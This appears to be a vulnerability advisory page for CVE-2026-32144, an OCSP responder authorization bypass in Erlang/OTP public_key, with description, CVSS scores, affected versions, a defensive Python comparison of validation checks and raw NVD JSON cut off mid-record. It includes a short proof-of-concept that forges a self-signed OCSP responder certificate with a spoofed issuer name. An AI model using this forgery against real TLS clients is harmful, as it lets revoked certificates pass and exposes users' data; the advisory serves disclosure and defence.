Security Vulnerability Report
CVE-2026-32144 CVSS 7.4 HIGH

CVE-2026-32144

Published: 2026-04-07 13:16:47
Last Modified: 2026-04-23 17:32:56
Source: 6b3ad84c-e1a6-4bf7-a703-f496b71e49db

Description

Improper Certificate Validation vulnerability in Erlang OTP public_key (pubkey_ocsp module) allows OCSP designated-responder authorization bypass via missing signature verification.

The OCSP response validation in public_key:pkix_ocsp_validate/5 does not verify that a CA-designated responder certificate was cryptographically signed by the issuing CA. Instead, it only checks that the responder certificate's issuer name matches the CA's subject name and that the certificate has the OCSPSigning extended key usage. An attacker who can intercept or control OCSP responses can create a self-signed certificate with a matching issuer name and the OCSPSigning EKU, and use it to forge OCSP responses that mark revoked certificates as valid.

This affects SSL/TLS clients using OCSP stapling, which may accept connections to servers with revoked certificates, potentially transmitting sensitive data to compromised servers. Applications using the public_key:pkix_ocsp_validate/5 API directly are also affected, with impact depending on usage context.

This vulnerability is associated with program files lib/public_key/src/pubkey_ocsp.erl and program routines pubkey_ocsp:is_authorized_responder/3.

This issue affects OTP from OTP 27.0 until OTP 28.4.2 and 27.3.4.10 corresponding to public_key from 1.16 until 1.20.3 and 1.17.1.2, and ssl from 11.2 until 11.5.4 and 11.2.12.7.
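
The gap described above, as an added Python example (not code from this page or from the Erlang/OTP project): a name-and-EKU comparison accepts any certificate that carries the CA's name, while additionally verifying the CA's signature over the responder certificate rejects it. The function names, the ECDSA P-256 keys and all certificates are constructed for illustration, and the signature check assumes an ECDSA CA key.

```python
import datetime
from cryptography import x509
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.x509.oid import ExtendedKeyUsageOID, NameOID

def _name(cn):
    return x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, cn)])

def make_cert(subject_cn, issuer_cn, subject_key, signing_key, ocsp_eku):
    """Build a constructed, short-lived test certificate (sample data only)."""
    now = datetime.datetime.now(datetime.timezone.utc)
    b = (x509.CertificateBuilder()
         .subject_name(_name(subject_cn)).issuer_name(_name(issuer_cn))
         .public_key(subject_key.public_key()).serial_number(x509.random_serial_number())
         .not_valid_before(now - datetime.timedelta(minutes=1))
         .not_valid_after(now + datetime.timedelta(days=1)))
    if ocsp_eku:
        b = b.add_extension(
            x509.ExtendedKeyUsage([ExtendedKeyUsageOID.OCSP_SIGNING]), critical=False)
    return b.sign(signing_key, hashes.SHA256())

def name_and_eku_match(responder, ca):
    """The two checks the description lists: issuer name and OCSPSigning EKU."""
    try:
        eku = responder.extensions.get_extension_for_class(x509.ExtendedKeyUsage).value
    except x509.ExtensionNotFound:
        return False
    return responder.issuer == ca.subject and ExtendedKeyUsageOID.OCSP_SIGNING in eku

def is_designated_responder(responder, ca):
    """Name and EKU checks plus the missing step: the CA's signature must verify."""
    if not name_and_eku_match(responder, ca):
        return False
    try:  # assumption: the CA key is ECDSA, as in the constructed data below
        ca.public_key().verify(responder.signature, responder.tbs_certificate_bytes,
                               ec.ECDSA(responder.signature_hash_algorithm))
    except InvalidSignature:
        return False
    return True

def demo():
    """Run both checks on a CA-issued and a self-signed responder (constructed)."""
    ca_key, good_key, other_key = (ec.generate_private_key(ec.SECP256R1()) for _ in range(3))
    ca = make_cert("Example CA", "Example CA", ca_key, ca_key, False)
    issued = make_cert("OCSP Responder", "Example CA", good_key, ca_key, True)
    self_signed = make_cert("OCSP Responder", "Example CA", other_key, other_key, True)
    return {n: (name_and_eku_match(c, ca), is_designated_responder(c, ca))
            for n, c in (("issued", issued), ("self_signed", self_signed))}
```

`demo()` returns a pair per certificate: the result of the name-and-EKU comparison, then the result with signature verification added.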

CVSS Details

CVSS Score: 7.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:erlang:erlang\/otp:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:erlang:erlang\/otp:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:erlang:erlang\/public_key:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:erlang:erlang\/public_key:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:erlang:erlang\/ssl:*:*:*:*:*:*:*:* - VULNERABLE
OTP 27.0 - OTP 28.4.2
OTP 27.3.4.10
public_key 1.16 - 1.20.3
public_key 1.17.1.2
ssl 11.2 - 11.5.4
ssl 11.2.12.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
Conceptual PoC for CVE-2026-32144
Generates a forged OCSP Responder Certificate to bypass signature verification.
Note: This requires control over the OCSP response or interception capabilities.
"""
import datetime

from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization

# Generate a private key for the forged responder
key = rsa.generate_private_key(
    public_exponent=65537,
    key_size=2048,
)

# Extract the Subject Name from the target CA to mimic as Issuer
# In a real attack, this would match the actual CA's Subject
ca_name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "Fake CA")])

# Create the forged responder certificate
# The key exploit is setting the Issuer to the CA's Name without a real signature
subject = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "Forged OCSP Responder")])
now = datetime.datetime.now(datetime.timezone.utc)
cert = (
    x509.CertificateBuilder()
    .subject_name(subject)
    .issuer_name(ca_name)  # Impersonating the CA as Issuer
    .public_key(key.public_key())
    .serial_number(x509.random_serial_number())
    .not_valid_before(now)
    .not_valid_after(now + datetime.timedelta(days=365))
    # Add the OCSPSigning EKU which is checked, but signature is not
    .add_extension(
        x509.ExtendedKeyUsage([x509.ObjectIdentifier("1.3.6.1.5.5.7.3.9")]),  # OCSP Signing
        critical=False,
    )
    .sign(key, hashes.SHA256())  # Self-signed
)

print("Forged Responder Certificate Created:")
print(cert.public_bytes(serialization.Encoding.PEM).decode())
```

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32144", "sourceIdentifier": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db", "published": "2026-04-07T13:16:46.570", "lastModified": "2026-04-23T17:32:55.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Certificate Validation vulnerability in Erlang OTP public_key (pubkey_ocsp module) allows OCSP designated-responder authorization bypass via missing signature verification.\n\nThe OCSP response validation in public_key:pkix_ocsp_validate/5 does not verify that a CA-designated responder certificate was cryptographically signed by the issuing CA. Instead, it only checks that the responder certificate's issuer name matches the CA's subject name and that the certificate has the OCSPSigning extended key usage. An attacker who can intercept or control OCSP responses can create a self-signed certificate with a matching issuer name and the OCSPSigning EKU, and use it to forge OCSP responses that mark revoked certificates as valid.\n\nThis affects SSL/TLS clients using OCSP stapling, which may accept connections to servers with revoked certificates, potentially transmitting sensitive data to compromised servers. 
Applications using the public_key:pkix_ocsp_validate/5 API directly are also affected, with impact depending on usage context.\n\nThis vulnerability is associated with program files lib/public_key/src/pubkey_ocsp.erl and program routines pubkey_ocsp:is_authorized_responder/3.\n\nThis issue affects OTP from OTP 27.0 until OTP 28.4.2 and 27.3.4.10 corresponding to public_key from 1.16 until 1.20.3 and 1.17.1.2, and ssl from 11.2 until 11.5.4 and 11.2.12.7."}], "metrics": {"cvssMetricV40": [{"source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": 
"NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:erlang:erlang\\/otp:*:*:*:*:*:*:*:*", "versionStartIncluding": "27.0", "versionEndExcluding": "27.3.4.10", "matchCriteriaId": "2771D519-4124-4D3F-A8E0-3E4704973B3E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:erlang:erlang\\/otp:*:*:*:*:*:*:*:*", "versionStartIncluding": "28.0", "versionEndExcluding": "28.4.2", "matchCriteriaId": "D2E111DA-579A-438F-A2FF-5799B01AF401"}, {"vulnerable": true, "criteria": "cpe:2.3:a:erlang:erlang\\/public_key:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.16", "versionEndExcluding": "1.17.1.2", "matchCriteriaId": "459DB53B-9049-48D3-86F9-5CB3286BDCFB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:erlang:erlang\\/public_key:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.18", "versionEndExcluding": "1.20.3", "matchCriteriaId": "2F0812B0-29FA-4EAB-B557-5FB6C8D2D581"}, {"vulnerable": true, "criteria": "cpe:2.3:a:erlang:erlang\\/ssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.2", "versionEndExcluding": "11.2.12.7", "matchCriteriaId": "BDA65CE8-5C84-4EAE-8709-44240FB9E2A1"}, {"vulnerable": t ... (truncated)